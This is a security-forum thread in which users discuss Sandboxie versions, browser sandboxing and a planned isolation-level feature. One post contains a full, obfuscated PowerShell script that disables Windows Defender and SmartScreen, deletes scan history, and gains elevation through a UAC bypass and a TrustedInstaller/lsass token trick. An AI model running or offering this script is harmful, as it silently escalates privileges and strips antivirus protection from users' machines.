Sandboxie Technologies (SBIE Open source)

Discussion in 'Sandboxie (SBIE Open Source) Plus & Classic' started by bo elam, Apr 22, 2020.

  1. mmlr

    mmlr Registered Member

    Joined:
    May 31, 2020
    Posts:
    17
    Location:
    n/a
    Are you going to upgrade your Sandboxie to David or will you continue to use the older version 5.33.6?
    Do you propose to stay with version 5.33.6 ?
    Doesn't using a bypass for chromium web browsers lower the security level?
    I wish you all a Merry Christmas.:)
     
    Last edited: Dec 17, 2020
  2. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    It is very likely that sooner or later I will update to David's. FWIW, I am very happy to see David doing what he is doing. I support him and tip my hat to him. He has done a hell of a job. I don't propose staying put with 5.33.6. I am doing it because there is nothing to gain for me personally to move to his build at this time. But I am sure, eventually, I will have to do it. When that happens, when something really important breaks (from my POV, that hasn't happened yet), then I ll move.

    I really don't care about new features. Testing new features is no reason for me to move. I can understand he wanting to put his mark in Sandboxie (making changes is how he 'll do that) but to me, most if not all of this changes are actually a turn off. I hope he doesn't get rid of Classic.

    Regarding the Edge/Chromium workaround. From my POV, Sandboxie works best when there is no sandboxing or Protected mode in the programs we run under SBIE. So, from my POV, when we run Edge or Chrome under SBIE, without the Edge sandbox, we are actually safer as it will not interfere with SBIE. In my view, stretching what I just said a bit, this is also why I believe I am safer running SBIE on its own, with no other security program running along SBIE. By running SBIE on its own, there is nothing that will interfere with SBIE if I get hit by malware. Nothing.

    Bo
     
  3. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    Yes, I am still doing it with Firefox. To me, with Firefox is a must. Mozilla keeps making it harder to get rid of MP, but it can still be done. With the update to Firefox 83, they changed how to disable MP, so now, every time there is a Firefox update, we have to modify the setting that disables MP. It is annoying but I am glad I still can disable MP. The 0/1 next to Multiprocess means disabled.

    Sin título2.jpg

    FWIW, Firefox is running very nice under SBIE. Keeping the browser the way someone who changes the browser a lot to their liking, is what is hard. Mozilla is continuously changing the settings or the workarounds to get the browser looking and functioning the way you want it but that's the price for getting what we want. I am still in 83, and probably will update until about 85. Because of the extra work we have to go thru with the updates to Firefox, I am not doing every update.

    Bo
     
  4. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    I suggest you think about this (changing restrictions....to levels). Right now, there are hundreds of different ways to restrict a sandbox. If you change restrictions to choose isolation level or something like that, you ll be the one deciding how restricted or loose my sandbox is gonna be. In my case, when I create a new sandbox, I always try to strike a balance between usability and security. I set them up as restricted as possible but without loosing any usability. I don't give up usability for security. To me, the restrictions are an extra, gravy, but is nice to tighten them up as much as possible without making the sandbox unusable or inconvenient. This is something that is easy to achieve the way Restrictions are.

    If you change Restrictions to Levels, how would you know what I want to allow running or access to the internet. What I want or bjm or you want running or connecting to the internet is different.and depends on the program you are running sandboxed. Just with internet setting you can do so much with it. With Levels, no more hundreds of ways for restricting sandboxes. Changing Restrictions to levels doesn't really make sense (just my opinion).

    Bo
     
  5. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    452
    Location:
    Austria
    Hi Bo,

    But already now you would gain something (and even something quite important): additional security.

    We should not overlook what David has written concerning the last Sophos version:
    It applies to me too, of course (as I also continue to use 5.33.6.). And I would switch immediately to David's build if there were not the annoying problems with Windows Defender which still does not accept the 32-bit version.
     
  6. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,031
    Location:
    Mexico
    Then why don't you just disable Windows Defender?

    Better use Sandboxie than WD...
     
  7. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    452
    Location:
    Austria
    Yes, of course I could. But I do not want to disable one security feature in order to be able to use another one - especially when I know that normally they should harmonize.
     
  8. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,177
    Location:
    Viena
    I don't intent to change anything about the underlying mechanisms, just that in the creation window, instead of having to check 100 options you get a drop down with a couple of pre configured restrictions.
    So whatever Level you choose that will only affect what restriction options will be set in the newly created box, you will of cause be able to change them at will an in any constellation afterwards in the box options.

    Keep in mind that for non skilled users the security implications of various options may not be apparent, so a mechanism that evaluates the configured options and displays a value in a security level column would also help the user notice if he did some bone headed mistake and made a particular box insecure.

    So think of the levels really just like creation templates with a semis art security score indicator.

    Possible levels could be:
    Hardened (reduced compatybility)
    Default <- as it is now
    Improved compatibility (reduced security)
    Open Box (no security isolation only FS and Reg virtualization)


    I think especially "Open Box" is something many users would want as it would target application/game virtualization with excellent compatibility. And when I look through the bug reports a lot of users use sandboxie to run games in.


    Now when I think about it actually saving the level value as for example IsolationLevelHint and comparing it against the estimated IsolationLevel mentioned above would be even better as to than display a explicit warning for miss configured boxes.
    Also the "run sandboxes feature" should probably be enhanced with a grouping depending on the isolation level to avoid users accidentally selecting a box with a lest restrictive set of options as they may have intended.
     
    Last edited: Dec 18, 2020
  9. henryg1

    henryg1 Registered Member

    Joined:
    Jun 14, 2020
    Posts:
    206
    Location:
    uk
    I'm a "Classic" man, but whichever version you are doing fantastic work, so thank you :thumb::thumb::thumb:
     
  10. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,031
    Location:
    Mexico
    All of this is brilliant. I'm in.
    Thanks for giving sbie a new chance of evolving.
     
  11. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,031
    Location:
    Mexico
    But you know M$ Windows and its sudden changes that do not harmonize with anything. Sbie is far superior protection than WD. I recommend to use another A/V solution if you necessarily want to run one. You can disable WD with this script and run it again to enable it.

    Code:
    @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
    set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
    
    ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
    if ($env:1 -ne 6 -and $env:1 -ne 7) {
      $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
      if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
    }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
    
    ## Comment to not hide per-user toggle notifications
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
    sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
    
    ## Cascade elevation
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## Reload from volatile registry as needed
    $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
    $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
    $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; break
    }
    
    ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
    }
    
    ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
    if ($u -eq 2) {
      $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
      1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
      $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
      nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
      $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
      $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
      $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
      $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      net1 start windefend
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      kill -Name MpCmdRun -Force -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
    sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
    sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
    rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
    sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
    rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
    sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
    rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
    sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
    rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
    sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
    rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close windows built-in lame uac bpass and/or reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
    #-_-# hybrid script, can be pasted directly into powershell console
    
    
     
  12. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    452
    Location:
    Austria
    Thanks, Mr. X. But disabling WD is by far too delicate for me (though I share your opinion that Sbie gives an excellent protection). For the time being I hope that the compatibilty issues will be resolved* and for the medium-term I have in mind a change from Win 32-bit to 64-bit.

    *[Edit: In the meantime they are resolved: Windows Defender no longer complains about the installer. I have installed now version 5.45.0 on my machine. :)]
     
    Last edited: Dec 19, 2020
  13. mmlr

    mmlr Registered Member

    Joined:
    May 31, 2020
    Posts:
    17
    Location:
    n/a
    Thank you for your comprehensive answer.
     
  14. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,812
    Location:
    The Netherlands
    OK I see, but what I'm asking is if you need to disable multi-process (sandbox) in order to make FF work correctly with SBIE? Shouldn't it work out of the box? BTW, I have checked out Sandboxie Plus, it's interesting but seems to be missing a lot of features from Sandboxie Classic.

    Yes I understand your point. Luckily I can tell you that Sandboxie 5.45 works just as fine, I have installed it on Win 10 and I will probably also install it on Win 8.1, if it causes problems I can always downgrade.
     
  15. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    Not at all. Firefox with Multiprocess works just fine with Sandboxie. There is no compatibility issue. I disable Multiprocess only because it is my personal choice.

    Bo
     
    Last edited: Dec 18, 2020
  16. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    You are welcome. (Merry Christmas).

    Bo
     
  17. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,812
    Location:
    The Netherlands
    OK I see, at first I was also a bit negative about this Multiprocess thing, but it's probably best to keep it enabled for security reasons. The cool thing about FF is that you can limit the amount of child processes to only 4, I wish I could do this with Vivaldi, it would improve RAM usage.
     
  18. g17

    g17 Registered Member

    Joined:
    Sep 30, 2017
    Posts:
    58
    Location:
    MI
    I'm glad to hear someone else is doing this that has more system knowledge than I do.

    I used to run the AV programs, malware, and Ad aware programs. They take up a lot of resources, and are reactive instead of simply preventing issues in the first place. I download malwarebytes once a year or so to check and have never seen a single issue.

    My total security system is SBIE, Tinywall (I disable the Win firewall), a sandboxed POP email notifier to check my messages while they are still on the server, A filtering proxy (which is not that useful anymore due to https issues), and some general hardening I got from research.

    Never had an issue. I love the idea that I have an isolated browsing and email system that I can simply delete and whatever is there will be gone and unable to do any damage. I'm sure it's not 100% but the proof is in my pudding. My niece on the other hand uses the standard setup with all the AV programs and Windows security software and over Thanksgiving I cleaned over 30 worms and viruses and malware/adware off her system, and this happens constantly.
     
  19. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,812
    Location:
    The Netherlands
    BTW, I have noticed that all of a sudden InputPersonalization.exe is running in my Vivaldi Sandbox, is this related to Vivaldi? Same goes for RuntimeBroker.exe, but this has been the case for months, while InputPersonalization.exe is something new. Perhaps other Vivaldi users can give me some feedback, I'm still using Win 8.1 with Sandboxie v 5.33.3, from Sophos.
     
  20. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    5,995
    Location:
    Nicaragua
    InputPersonalization.exe is part of Windows. You can find the file here: C:\Program Files\Common Files\microsoft shared\ink.

    If it runs with Vivaldi, is probably because Vivaldi is doing something that triggers it to run.
    Same thing. runtimebroker runs when you run some browsers (I know this for sure, and likely does also for other reasons as well). And fade away when you close the browser. My W10 starts with at least 2 runtimebrokers without me running anything (this is normal).

    You got nothing to worry about, Rasheed. Unless it is malware trying to pass itself as the real files. But I doubt very much that's whats happening.

    Bo
     
  21. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,812
    Location:
    The Netherlands
    Thanks for the feedback, but yeah it's a bit weird. I have killed InputPersonalization.exe and will see what happens. It does indeed looks like Vivaldi is somehow triggering it, same goes for RuntimeBroker.exe.

    On the other hand, the parent process is always SandboxieDcomLaunch.exe, but I guess this is normal. Still it feels a bit shady, but I also doubt that malware is playing a role, but you never know. I will ask about this in the Vivaldi forum.
     
  22. EspressoGuy

    EspressoGuy Registered Member

    Joined:
    May 4, 2020
    Posts:
    18
    Location:
    USA
    There are a number of posts telling how to get SBIE to work with current versions of Chrome. They say to Add --no-sandbox -test-type after Chrome.exe in the shortcut. I'm concerned that --no-sandbox will turn off sandboxing, rendering SBIE useless. What effect does that parameter have on sandbox protection?
     
  23. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,069
    Location:
    .
    We Ask Members to Only Keep Questions for Version 5.33.6 in this Topic.
    I've replied to your query here >
    https://www.wilderssecurity.com/thr...ith-signed-driver.434924/page-18#post-2979490
     
  24. Quippy

    Quippy Registered Member

    Joined:
    Jan 3, 2021
    Posts:
    1
    Location:
    usa
    Got lost in this thread! I've been using SB for a while, nothing fancy, just as a way to run Firefox inside a sandbox. But I've been having issues crop up and tried updating SB without doing any extensive research. I didn't know that it had been forked, or that only two people were working on it. I had assumed some hazy idea that thousands of hobby enthusiast were all helping improve Sandboxie

    I tried the Plus version & ran into some complications, so I un-installed and went to start over from scratch, just to get back to how things used to be. But the OS wont let the driver install, as it's not signed. So now it looks like I can't use SB anymore?

    I'm still using Win7. I looked into upgrading that machine to Win10, but the motherboard is old and there's no driver support. Plus I'm not sure if I want to deal with learning new workflows for all the software that won't carry over

    I've noticed Firefox has masked my OS so websites see my OS as 'Win10'

    I have an older Thinkpad with Win10 and Sandboxie works ok on that. So I guess I should avoid trying to update Sandboxie on that machine!

    So what can I do about this Win7 driver issue? Install VMware or something & forget about Sandboxie?

    I have the downloads for Sandboxie-Plus, including a RC4 file for a Win7 driver. No idea what to do with an RC4. I've looked for info on what that is and seems to be a flight simulator game file, not a system driver
     
  25. Radagast70

    Radagast70 Registered Member

    Joined:
    Oct 31, 2020
    Posts:
    13
    Location:
    Germany
    You can install the last version v5.33.6 from Sophos, which also is now Freeware. With this version there are no driver problems with Windows 7. Or you can install Davids fork (classical version 5.4x or his new Plus-version 0.5.x), but here the driver for Windows 7 isn't signed yet, so it needs to be included in the Whitelist from your virus scanner, to avoid false positive alerts.

    For an overview of all versions of Sandboxie, you can go to this post - stapp described it there very well.
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.